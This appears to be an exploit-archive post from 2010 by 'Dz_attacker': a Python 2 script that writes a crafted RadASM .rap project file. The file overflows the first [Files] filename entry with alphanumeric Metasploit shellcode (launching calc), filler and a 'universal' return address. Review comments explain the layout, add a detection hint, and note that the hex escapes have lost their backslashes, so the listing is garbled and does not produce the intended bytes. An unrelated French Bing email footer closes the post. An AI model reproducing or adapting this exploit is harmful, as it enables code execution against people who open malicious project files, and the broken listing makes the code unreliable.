radasmrap-overflow.txt
Posted on 12 February 2010
Note: i used different way to exploit it (its not a duplicated exploit)
# Exploit Title: Radasm (.rap) Universal buffer overflow Exploit
# Date: 10/02/2010
# Author: Dz_attacker
# Tested on: Windows xp sp3
# Code :
#!/usr/bin/python
#[+] Radasm (.rap) Universal buffer overflow Exploit
#[+] Original : http://www.exploit-db.com/exploits/11392
#[+] Exploit : Dz_attacker (dz_attacker@hotmail.fr)
#
# NOTE(review): Python 2 listing (print statement at the bottom). The string literals
# below are written as hex escape pairs, but as pasted here every backslash is missing,
# so each "x.." pair is plain text rather than a byte escape -- the listing appears to
# have lost characters during extraction. Read the pairs as documentation of the bytes
# the author intended; the script as shown does not produce them.
#
# header1: opening part of the RadASM project (.rap) INI text. The hex pairs decode to
# "[Project]", "Assembler=masm", "Group=1", "GroupExpand=1", "[Files]" and "1=AVP " --
# i.e. the oversized value that follows is placed in the first filename entry of the
# [Files] section.
header1=(
    "x5bx50x72x6fx6ax65x63x74x5dx0dx0ax41x73x73x65x6dx62x6cx65x72"
    "x3dx6dx61x73x6dx0dx0ax47x72x6fx75x70x3dx31x0dx0ax47x72x6fx75"
    "x70x45x78x70x61x6ex64x3dx31x0dx0ax5bx46x69x6cx65x73x5dx0dx0a"
    "x31x3dx41x56x50x20")
# header2: remainder of the .rap INI text placed after the injected value. It begins
# with ".Asm" (closing the "1=AVP ..." filename entry) and continues with the
# "[MakeFiles]", "[MakeDef]" and "[Group]" sections, so the written file still looks
# like a complete project file around the payload.
header2=(
    "x2ex41x73x6dx0dx0ax32x3dx41x56x50x20x4fx76x65x72x2ex49x6ex63"
    "x0dx0ax5bx4dx61x6bx65x46x69x6cx65x73x5dx0dx0ax30x3dx41x56x50"
    "x20x4fx76x65x72x2ex72x65x73x0dx0ax5bx4dx61x6bx65x44x65x66x5d"
    "x0dx0ax4dx65x6ex75x3dx30x2cx31x2cx31x2cx31x2cx31x2cx31x2cx31"
    "x2cx30x2cx30x2cx30x2cx30x2cx30x2cx30x2cx30x2cx30x2cx30x0dx0a"
    "x31x3dx34x2cx4fx2cx24x42x5cx52x43x2ex45x58x45x20x2fx76x2cx31"
    "x0dx0ax32x3dx33x2cx4fx2cx24x42x5cx4dx4cx2ex45x58x45x20x2fx63"
    "x20x2fx63x6fx66x66x20x2fx43x70x20x2fx6ex6fx36x43x6fx67x6fx20"
    "x2fx49x22x24x49x22x2cx32x0dx0ax33x3dx35x2cx4fx2cx24x42x5cx4c"
    "x49x4ex4bx2ex45x58x45x20x2fx53x55x42x53x59x53x54x45x4dx3ax57"
    "x49x4ex44x4fx57x53x20x2fx52x45x4cx45x41x53x45x20x2fx56x45x52"
    "x53x49x4fx4ex3ax34x2ex30x20x2fx4cx49x42x50x41x54x48x3ax22x24"
    "x4cx22x20x2fx4fx55x54x3ax22x24x35x22x2cx33x0dx0ax34x3dx30x2c"
    "x30x2cx2cx35x0dx0ax35x3dx72x73x72x63x2ex6fx62x6ax2cx4fx2cx24"
    "x42x5cx43x56x54x52x45x53x2ex45x58x45x2cx72x73x72x63x2ex72x65"
    "x73x0dx0ax36x3dx2ax2ex6fx62x6ax2cx4fx2cx24x42x5cx4dx4cx2ex45"
    "x58x45x20x2fx63x20x2fx63x6fx66x66x20x2fx43x70x20x2fx6ex6fx6c"
    "x6fx67x6fx20x2fx49x22x24x49x22x2cx2ax2ex61x73x6dx0dx0ax37x3d"
    "x30x2cx30x2cx22x24x45x5cx4fx6cx6cx79x44x62x67x22x2cx35x0dx0a"
    "x5bx47x72x6fx75x70x5dx0dx0ax47x72x6fx75x70x3dx41x64x64x65x64"
    "x20x66x69x6cx65x73x2cx41x73x73x65x6dx62x6cx79x2cx52x65x73x6f"
    "x75x72x63x65x73x2cx4dx69x73x63x2cx4dx6fx64x75x6cx65x73x0dx0a"
    "x31x3dx31")
# win32_exec - EXITFUNC=process CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com
# shellcode: Metasploit-generated proof-of-concept payload described by the line above
# (starts calc.exe). It is alphanumeric-encoded (PexAlphaNum) -- presumably chosen so the
# bytes stay printable inside a text INI file; the author does not say.
shellcode=(
    "xebx03x59xebx05xe8xf8xffxffxffx4fx49x49x49x49x49"
    "x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36"
    "x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34"
    "x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41"
    "x56x58x34x5ax38x42x44x4ax4fx4dx4ex4fx4ax4ex46x44"
    "x42x30x42x50x42x50x4bx58x45x54x4ex43x4bx48x4ex37"
    "x45x50x4ax57x41x30x4fx4ex4bx58x4fx34x4ax41x4bx58"
    "x4fx55x42x52x41x50x4bx4ex49x54x4bx58x46x33x4bx38"
    "x41x30x50x4ex41x33x42x4cx49x59x4ex4ax46x58x42x4c"
    "x46x57x47x50x41x4cx4cx4cx4dx50x41x30x44x4cx4bx4e"
    "x46x4fx4bx53x46x55x46x52x46x50x45x57x45x4ex4bx38"
    "x4fx55x46x52x41x50x4bx4ex48x56x4bx48x4ex50x4bx44"
    "x4bx58x4fx45x4ex51x41x50x4bx4ex4bx58x4ex51x4bx38"
    "x41x30x4bx4ex49x58x4ex35x46x42x46x50x43x4cx41x43"
    "x42x4cx46x36x4bx48x42x44x42x33x45x58x42x4cx4ax57"
    "x4ex30x4bx38x42x54x4ex30x4bx38x42x57x4ex41x4dx4a"
    "x4bx48x4ax46x4ax30x4bx4ex49x30x4bx38x42x38x42x4b"
    "x42x30x42x30x42x50x4bx38x4ax36x4ex43x4fx55x41x53"
    "x48x4fx42x36x48x45x49x48x4ax4fx43x48x42x4cx4bx37"
    "x42x55x4ax56x50x57x4ax4dx44x4ex43x57x4ax46x4ax59"
    "x50x4fx4cx48x50x30x47x55x4fx4fx47x4ex43x56x41x56"
    "x4ex36x43x56x42x30x5a")
# Assemble the file contents. Inside the [Files] "1=" entry the author places: 2 filler
# bytes, the shellcode, filler up to a fixed total of 1809 bytes, 3 more filler bytes,
# two short byte sequences, and the 4-byte value labelled as the (universal) return
# address; header2 then closes the INI text.
# Defender note: a [Files] filename value of roughly 1.8 KB is far beyond any legitimate
# path length, so crafted .rap files of this shape are straightforward to flag.
buffer = header1
buffer += "x41"*2
buffer += shellcode
buffer += "x41"*(1809-len(shellcode))  # keeps shellcode + filler at a constant 1809 bytes
buffer += "x61"*3
buffer += "xFFxD0"
buffer += "xEBxF9x90x90"
buffer += "x55x25x40x00" #univ ret
buffer += header2
# Write the crafted project file to the current working directory.
# NOTE(review): the bare except swallows the real cause of a failure (permissions, disk
# full, ...); catching IOError and printing the exception would be more informative.
try:
    rap = open("exploit.rap",'w')
    rap.write(buffer)
    rap.close()
    print "Exploit file created! "
except:
    print "Error occured!"
________________________________ Vous cherchez l'intégrale des clips de Michael Jackson ? Bing ! Trouvez !<http://www.bing.com/videos/search?q=Michael+Jackson&FORM=MVDE6>